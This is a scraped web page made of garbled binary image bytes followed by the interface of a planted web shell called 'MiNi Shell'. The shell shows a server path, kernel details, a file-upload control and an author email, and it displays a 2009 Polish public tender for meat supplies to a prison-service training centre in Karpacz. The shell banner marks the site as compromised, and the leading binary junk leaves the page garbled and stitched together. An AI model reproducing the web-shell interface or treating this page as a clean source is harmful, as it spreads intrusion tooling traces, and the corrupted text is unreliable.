JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090903/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090903/304800-N-2009.html

<p class="kh_header"><b>Karpacz: Dostawa mięsa i produktów mięsnych</b><br>
<b>Numer ogłoszenia: 304800 - 2009; data zamieszczenia: 03.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Ośrodek Doskonalenia Kadr Służby Więziennej , ul. Wilcza 1, 58-540 Karpacz, woj. dolnośląskie, tel. 075 7619412, faks 075 7616256.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kruczeskaly.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Państwowa jednostka organizacyjna nie posiadająca osobowości prawnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa mięsa i produktów mięsnych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Lp.
KOD CPV
Nazwa towaru
j.m
Orientacyjna wielkość zamówienia na okres 12 miesięcy
1
2
3
5
6
1
15131130-5
Baleron wieprzowy
kg
200,00
2
15131220-3
Boczek wieprzowy, gotowany 
kg
250,00
3
15111200-1
Cielęcina
kg
20,00
4
15112100-7
Ćwierci tylne z kurczaka
kg
550,00
5
15131500-0
Ćwierci wędzone z kurczaka
kg
10,00
6
15113000-3
Golonka
kg
500,00
7
15131400-9
Kabanosy wieprzowe
kg
30,00
8
15113000-3
Karkówka wieprzowa
kg
600,00
9
15131134-3
Kaszanka
kg
200,00
10
15131400-9
Kiełbasa biała surowa
kg
500,00
11
15131135-0
Kiełbasa golonkowa z indyka
kg
200,00
12
15131400-9
Kiełbasa grillowa
kg
200,00
13
15131130-5
Kiełbasa krakowska sucha wieprzowa
kg
200,00
14
15131130-5
Kiełbasa mortadela 
kg
110,00
15
15131130-5
Kiełbasa szynkowa wieprzowa
kg
150,00
16
15131400-9
Kiełbasa śląska
kg
150,00
17
15131130-5
Kiełbasa wieprzowa wędzona, pieczona
kg
30,00
18
15131400-9
Kiełbasa zwyczajna
kg
200,00
19
15131135-0
Kiełbasa żywiecka  z indyka
kg
80,00
20
15131130-5
Kiełbasa żywiecka wieprzowa
kg
180,00
21
15131130-5
Kindziuk
kg
50,00
22
15112130-6 
Kurczak
kg
400,00
23
15131130-5
Łopatka pieczona
wieprzowa
kg
30,00
24
15131130-5
Łopatka wędzona
kg
100,00
25
15113000-3
Łopatka wieprzowa bez kości
kg
1300,00
26
15131110-9
Metka cebulowa
kg
50,00
27
15131110-9
Metka łososiowa
kg
50,00
28
15131135-0
Mielonka drobiowa
kg
60,00
29
15131130-5
Mielonka wieprzowa
kg
60,00
30
15113000-3
Mięso gulaszowe, wieprzowe
kg
400,00
31
15131130-5
Ogonówka wieprzowa
kg
300,00
32
15131400-9
Paróweczki cielęce
kg
50,00
33
15131400-9
Parówki śląskie
kg
400,00
34
15131310-1
Pasztet pieczony
kg
80,00
35
15131310-1
Pasztetowa wieprzowa
kg
100,00
36
15131130-5
Pieczeń rzymska
kg
60,00
37
15131130-5
Pieczeń wieprzowa
kg
50,00
38
15112100-7
Piersi z kurczaka
kg
900,00
39
15131135-0
Pierś indycza pieczona
kg
150,00
40
15131135-0
Polędwica drobiowa
kg
100,00
41
15131130-5
Polędwica sopocka
kg
150,00
42
15131135-0
Polędwica z indyka
kg
150,00
43
15113000-3
Polędwiczki wieprzowe
kg
350,00
44
15112100-7
Porcje rosołowe z kurcząt
kg
800,00
45
15131130-5
Rolada wieprzowa
kg
60,00
46
15131230-6
Salami 
kg
200,00
47
15131130-5
Salceson biały
kg
80,00
48
15131130-5
Schab pieczony
kg
100,00
49
15113000-3
Schab wieprzowy
kg
1100,00
50
15131400-9
Serdelki
kg
50,00
51
15112100-7
Skrzydła z kurcząt
kg
500,00
52
15113000-3
Słonina
kg
20,00
53
15113000-3
Szynka  wieprzowa - mięso bez kości
kg
150,00
54
15131135-0
Szynka biała z indyka
kg
100,00
55
15131135-0
Szynka indycza w galarecie
kg
50,00
56
15131130-5
Szynka kanapkowa
kg
200,00
57
15131130-5
Szynka wiejska
kg
200,00
58
15131130-5
Szynka wieprzowa gotowana
kg
150,00
59
15131130-5
Szynka wieprzowa konserwowa
kg
200,00
60
15131135-0
Szynka z indyka 
kg
150,00
61
15131130-5
Szynkówka wieprzowa
kg
60,00
62
15112300-9
Wątroba z kurczaka
kg
100,00
63
15131200-7
Wędzonka z łopatki
kg
60,00
64
15111100-0
Wołowina bez kości, pieczeniowa
kg
600,00
65
15113000-3
Żeberka wieprzowe
kg
300,00.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.11.30.00-3, 15.13.11.30-5, 15.13.12.20-3, 15.11.12.00-1, 15.11.21.00-7, 15.13.15.00-0, 15.13.14.00-9, 15.13.11.34-3, 15.13.11.35-0, 15.11.21.30-6, 15.13.11.10-9, 15.13.13.10-1, 15.13.12.30-6, 15.11.23.00-9, 15.13.12.00-7, 15.11.11.00-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
<p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W przetargu mogą wziąć udział Wykonawcy:

1. Spełniający warunki określone w przepisie art. 22 ust. 1 ustawy tj. Wykonawcy, którzy:
 
a)posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b)posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem  technicznym i osobami zdolnymi do wykonania zamówienia;
c)znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
d)nie podlegają wykluczeniu z postępowania o udzielenie zamówienia (na podstawie przepisu art. 24 ust.1 i 2 ustawy).


Sposób dokonywania oceny spełniania warunków udziału w postępowaniu:

Na potwierdzenie spełnienia ww. wymienionych warunków - Wykonawca dołączy do oferty oświadczenia i dokumenty wymienione w dziale VI SIWZ.

Ocena spełniania warunków wymaganych od Wykonawcy zostanie dokonana wg formuły: spełnia - nie spełnia..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> W celu potwierdzenia, że Wykonawca może ubiegać się o udzielenie zamówienia publicznego na warunkach określonych w art. 22 i art. 24 ustawy Zamawiający żąda złożenia dołączonych do SIWZ następujących dokumentów:
 1.aktualny wypis z rejestru lub zaświadczenie o wpisie do ewidencji, potwierdzające dopuszczenie do obrotu prawnego w zakresie objętym zamówieniem lub inny dokument stwierdzający status prawny Wykonawcy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
 2.decyzja Urzędu Skarbowego o nadaniu numeru NIP;
 3.zaświadczenie o  nadaniu numeru REGON;
 4.wypełniony i podpisany druk formularz ofertowy;
 5.szczegółową ofertę cenową, wykaz asortymentowo - ilościowo wraz z formularzem cenowym  -  załącznik nr 2, w tym:
 a)nazwę towaru,
 b)cenę jednostkową netto,
 c)wartość netto,
 d)stawkę VAT,
 e)wartość brutto każdej pozycji,
 f)podsumowanie wartości netto i brutto towarów wymienionych w załączniku nr 2;
 6.szczegółową ofertę cenową, wykaz asortymentowo - ilościowo wraz z formularzem cenowym  -  załącznik nr 2, w tym:
 a)oświadczenie, że Wykonawca nie podlega wykluczeniu z postępowania na podstawie art. 24 ustawy, zgodnie z załączonym drukiem - załącznik nr 3.
 7.oświadczenia z art. 22, zgodnie z załączonym drukiem - załącznik nr 4.
 8.oświadczenie, że Wykonawca dostarczy towar swoim środkiem transportu i na własny koszt - załącznik nr 5;
 9.oświadczenie o sposobie wykonywania zamówienia - samodzielnie lub z udziałem podwykonawców - załącznik nr 6;

Złożenie przez Wykonawcę fałszywych lub stwierdzających nieprawdę dokumentów oraz oświadczeń, spowoduje wykluczenie go z postępowania.

Dokumenty mogą być przedstawione w formie oryginałów albo kserokopii poświadczonej za zgodność z oryginałem przez dostawcę lub wykonawcę.
Brak jakiegokolwiek z określonych w specyfikacji dokumentów lub złożenie go w niewłaściwej formie spowoduje odrzucenie oferty..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.kruczeskaly.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Ośrodek Doskonalenia Kadr Służby Więziennej
ul. Wilcza 1, 58 - 540 Karpacz.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.09.2009 godzina 10:00, miejsce: Ośrodek Doskonalenia Kadr Służby Więziennej
ul. Wilcza 1, 58 - 540 Karpacz, Pokój nr 19.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com